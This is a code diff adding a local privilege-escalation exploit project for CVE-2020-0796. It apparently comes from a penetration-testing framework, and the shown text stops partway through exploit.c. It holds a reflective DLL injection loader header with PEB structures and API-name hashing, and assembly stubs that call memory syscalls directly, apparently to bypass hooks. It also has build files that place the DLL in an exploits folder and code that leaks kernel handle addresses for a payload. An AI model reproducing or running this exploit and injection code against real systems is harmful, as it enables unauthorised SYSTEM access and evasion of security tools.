+#endif
+//===============================================================================================//
@@ -0,0 +1,223 @@
+//===============================================================================================//
+// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+
+#include "ReflectiveDLLInjection.h"
+
+// Enable this define to turn on OutputDebugString support
+//#define ENABLE_OUTPUTDEBUGSTRING 1
+
+// Enable this define to turn on locking of memory to prevent paging
+#define ENABLE_STOPPAGING 1
+
+#define EXITFUNC_SEH		0xEA320EFE
+#define EXITFUNC_THREAD		0x0A2A1DE0
+#define EXITFUNC_PROCESS	0x56A2B5F0
+
+typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
+typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
+typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
+typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
+
+#define KERNEL32DLL_HASH				0x6A4ABC5B
+#define NTDLLDLL_HASH					0x3CFA685D
+
+#define LOADLIBRARYA_HASH				0xEC0E4E8E
+#define GETPROCADDRESS_HASH				0x7C0DFCAA
+#define VIRTUALALLOC_HASH				0x91AFCA54
+#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
+
+#ifdef ENABLE_STOPPAGING
+typedef LPVOID(WINAPI * VIRTUALLOCK)(LPVOID, SIZE_T);
+#define VIRTUALLOCK_HASH				0x0EF632F2
+#endif
+
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+typedef LPVOID(WINAPI * OUTPUTDEBUG)(LPCSTR);
+#define OUTPUTDEBUG_HASH				0x470D22BC
+#endif
+
+#define IMAGE_REL_BASED_ARM_MOV32A		5
+#define IMAGE_REL_BASED_ARM_MOV32T		7
+
+#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
+#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
+#define ARM_MOVW						0xF2400000
+#define ARM_MOVT						0xF2C00000
+
+#define HASH_KEY						13
+//===============================================================================================//
+#pragma intrinsic( _rotr )
+
+__forceinline DWORD ror(DWORD d)
+{
+	return _rotr(d, HASH_KEY);
+}
+
+__forceinline DWORD _hash(char * c)
+{
+	register DWORD h = 0;
+	do
+	{
+		h = ror(h);
+		h += *c;
+	} while (*++c);
+
+	return h;
+}
+//===============================================================================================//
+typedef struct _UNICODE_STR
+{
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR pBuffer;
+} UNICODE_STR, *PUNICODE_STR;
+
+// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
+//__declspec( align(8) ) 
+typedef struct _LDR_DATA_TABLE_ENTRY
+{
+	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STR FullDllName;
+	UNICODE_STR BaseDllName;
+	ULONG Flags;
+	SHORT LoadCount;
+	SHORT TlsIndex;
+	LIST_ENTRY HashTableEntry;
+	ULONG TimeDateStamp;
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
+// WinDbg> dt -v ntdll!_PEB_LDR_DATA
+typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
+{
+	DWORD dwLength;
+	DWORD dwInitialized;
+	LPVOID lpSsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	LPVOID lpEntryInProgress;
+} PEB_LDR_DATA, *PPEB_LDR_DATA;
+
+// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
+typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
+{
+	struct _PEB_FREE_BLOCK * pNext;
+	DWORD dwSize;
+} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
+
+// struct _PEB is defined in Winternl.h but it is incomplete
+// WinDbg> dt -v ntdll!_PEB
+typedef struct __PEB // 65 elements, 0x210 bytes
+{
+	BYTE bInheritedAddressSpace;
+	BYTE bReadImageFileExecOptions;
+	BYTE bBeingDebugged;
+	BYTE bSpareBool;
+	LPVOID lpMutant;
+	LPVOID lpImageBaseAddress;
+	PPEB_LDR_DATA pLdr;
+	LPVOID lpProcessParameters;
+	LPVOID lpSubSystemData;
+	LPVOID lpProcessHeap;
+	PRTL_CRITICAL_SECTION pFastPebLock;
+	LPVOID lpFastPebLockRoutine;
+	LPVOID lpFastPebUnlockRoutine;
+	DWORD dwEnvironmentUpdateCount;
+	LPVOID lpKernelCallbackTable;
+	DWORD dwSystemReserved;
+	DWORD dwAtlThunkSListPtr32;
+	PPEB_FREE_BLOCK pFreeList;
+	DWORD dwTlsExpansionCounter;
+	LPVOID lpTlsBitmap;
+	DWORD dwTlsBitmapBits[2];
+	LPVOID lpReadOnlySharedMemoryBase;
+	LPVOID lpReadOnlySharedMemoryHeap;
+	LPVOID lpReadOnlyStaticServerData;
+	LPVOID lpAnsiCodePageData;
+	LPVOID lpOemCodePageData;
+	LPVOID lpUnicodeCaseTableData;
+	DWORD dwNumberOfProcessors;
+	DWORD dwNtGlobalFlag;
+	LARGE_INTEGER liCriticalSectionTimeout;
+	DWORD dwHeapSegmentReserve;
+	DWORD dwHeapSegmentCommit;
+	DWORD dwHeapDeCommitTotalFreeThreshold;
+	DWORD dwHeapDeCommitFreeBlockThreshold;
+	DWORD dwNumberOfHeaps;
+	DWORD dwMaximumNumberOfHeaps;
+	LPVOID lpProcessHeaps;
+	LPVOID lpGdiSharedHandleTable;
+	LPVOID lpProcessStarterHelper;
+	DWORD dwGdiDCAttributeList;
+	LPVOID lpLoaderLock;
+	DWORD dwOSMajorVersion;
+	DWORD dwOSMinorVersion;
+	WORD wOSBuildNumber;
+	WORD wOSCSDVersion;
+	DWORD dwOSPlatformId;
+	DWORD dwImageSubsystem;
+	DWORD dwImageSubsystemMajorVersion;
+	DWORD dwImageSubsystemMinorVersion;
+	DWORD dwImageProcessAffinityMask;
+	DWORD dwGdiHandleBuffer[34];
+	LPVOID lpPostProcessInitRoutine;
+	LPVOID lpTlsExpansionBitmap;
+	DWORD dwTlsExpansionBitmapBits[32];
+	DWORD dwSessionId;
+	ULARGE_INTEGER liAppCompatFlags;
+	ULARGE_INTEGER liAppCompatFlagsUser;
+	LPVOID lppShimData;
+	LPVOID lpAppCompatInfo;
+	UNICODE_STR usCSDVersion;
+	LPVOID lpActivationContextData;
+	LPVOID lpProcessAssemblyStorageMap;
+	LPVOID lpSystemDefaultActivationContextData;
+	LPVOID lpSystemAssemblyStorageMap;
+	DWORD dwMinimumStackCommit;
+} _PEB, *_PPEB;
+
+typedef struct
+{
+	WORD	offset : 12;
+	WORD	type : 4;
+} IMAGE_RELOC, *PIMAGE_RELOC;
+//===============================================================================================//
+#endif
+//===============================================================================================//
@@ -0,0 +1,97 @@
+.code
+
+; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
+
+; Windows 7 SP1 / Server 2008 R2 specific syscalls
+
+ZwProtectVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 4Dh
+		syscall
+		ret
+ZwProtectVirtualMemory7SP1 endp
+
+ZwWriteVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 37h
+		syscall
+		ret
+ZwWriteVirtualMemory7SP1 endp
+
+ZwReadVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 3Ch
+		syscall
+		ret
+ZwReadVirtualMemory7SP1 endp
+
+; Windows 8 / Server 2012 specific syscalls
+
+ZwProtectVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 4Eh
+		syscall
+		ret
+ZwProtectVirtualMemory80 endp
+
+ZwWriteVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 38h
+		syscall
+		ret
+ZwWriteVirtualMemory80 endp
+
+ZwReadVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 3Dh
+		syscall
+		ret
+ZwReadVirtualMemory80 endp
+
+; Windows 8.1 / Server 2012 R2 specific syscalls
+
+ZwProtectVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 4Fh
+		syscall
+		ret
+ZwProtectVirtualMemory81 endp
+
+ZwWriteVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 39h
+		syscall
+		ret
+ZwWriteVirtualMemory81 endp
+
+ZwReadVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 3Eh
+		syscall
+		ret
+ZwReadVirtualMemory81 endp
+
+; Windows 10 / Server 2016 specific syscalls
+ 
+ZwProtectVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 50h
+		syscall
+		ret
+ZwProtectVirtualMemory10 endp
+
+ZwWriteVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 3Ah
+		syscall
+		ret
+ZwWriteVirtualMemory10 endp
+
+ZwReadVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 3Fh
+		syscall
+		ret
+ZwReadVirtualMemory10 endp
+
+end
@@ -0,0 +1,2 @@
+#include "stdafx.h"
+
@@ -0,0 +1,3 @@
+#pragma once
+
+#include "targetver.h"
@@ -0,0 +1,3 @@
+#pragma once
+
+#include <SDKDDKVer.h>
@@ -0,0 +1,26 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building HostingCLR x64 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building HostingCLR x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+PUSHD workspace
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2017 -> Visual Studio Tools"
+
+:END
@@ -0,0 +1,13 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\HostingCLR.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x64" />
+
+  <Target Name="x64">
+    <Message Text="Building HostingCLR x64 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+  </Target>
+</Project>
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29926.136
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2020-0796", "CVE-2020-0796.vcxproj", "{7282AA86-42B1-4C57-BC33-C01C9233FA5F}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.ActiveCfg = Debug|x64
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.Build.0 = Debug|x64
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.ActiveCfg = Debug|Win32
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.Build.0 = Debug|Win32
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.ActiveCfg = Release|x64
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.Build.0 = Release|x64
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.ActiveCfg = Release|Win32
+		{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {485543BE-F94B-499F-95FD-AF81E8ED9B1E}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,252 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <ProjectGuid>{7282AA86-42B1-4C57-BC33-C01C9233FA5F}</ProjectGuid>
+    <RootNamespace>CVE20200796</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+    <TargetExt>.dll</TargetExt>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <TargetExt>.dll</TargetExt>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetExt>.dll</TargetExt>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetExt>.dll</TargetExt>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
+    </Link>
+    <PreLinkEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
+    mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
+    </PreLinkEvent>
+    <PostBuildEvent>
+      <Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
+    mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
+    </Link>
+    <PreLinkEvent>
+      <Command>
+      </Command>
+    </PreLinkEvent>
+    <PostBuildEvent>
+      <Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
+    mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="exploit.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="exploit.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,366 @@
+/*
+ * CVE-2020-0796 LPE
+ *
+ * Daniel Garcia Gutierrez (@danigargu) - danigargu[at]gmail.com
+ * Manuel Blanco Parajon (@dialluvioso) - dialluvioso[at]protonmail.com
+ * Date: 03/29/2020
+ *
+ **/
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <TlHelp32.h>
+#include "exploit.h"
+
+typedef struct _MSF_PAYLOAD {
+	DWORD  dwSize;
+	CHAR  cPayloadData[];
+} MSF_PAYLOAD;
+typedef MSF_PAYLOAD* PMSF_PAYLOAD;
+
+ULONG64 get_handle_addr(HANDLE h) {
+	ULONG len = 20;
+	NTSTATUS status = (NTSTATUS)0xc0000004;
+	PSYSTEM_HANDLE_INFORMATION_EX pHandleInfo = NULL;
+	
+	HMODULE ntdll = GetModuleHandle("ntdll.dll");
+	if (ntdll == NULL) {
+		return 0;
+	}
+
+	fpNtQuerySystemInformation NtQuerySystemInformation = (fpNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
+	if (NtQuerySystemInformation == NULL) {
+		return 0;
+	}
+
+	do {
+		len *= 2;
+		pHandleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)GlobalAlloc(GMEM_ZEROINIT, len);
+		status = NtQuerySystemInformation(SystemExtendedHandleInformation, pHandleInfo, len, &len);
+	} while (status == (NTSTATUS)0xc0000004);
+
+	if (status != (NTSTATUS)0x0) {
+		return 0;
+	}
+
+	DWORD mypid = GetProcessId(GetCurrentProcess());
+	ULONG64 ptrs[1000] = { 0 };
+	for (int i = 0; i < pHandleInfo->NumberOfHandles; i++) {
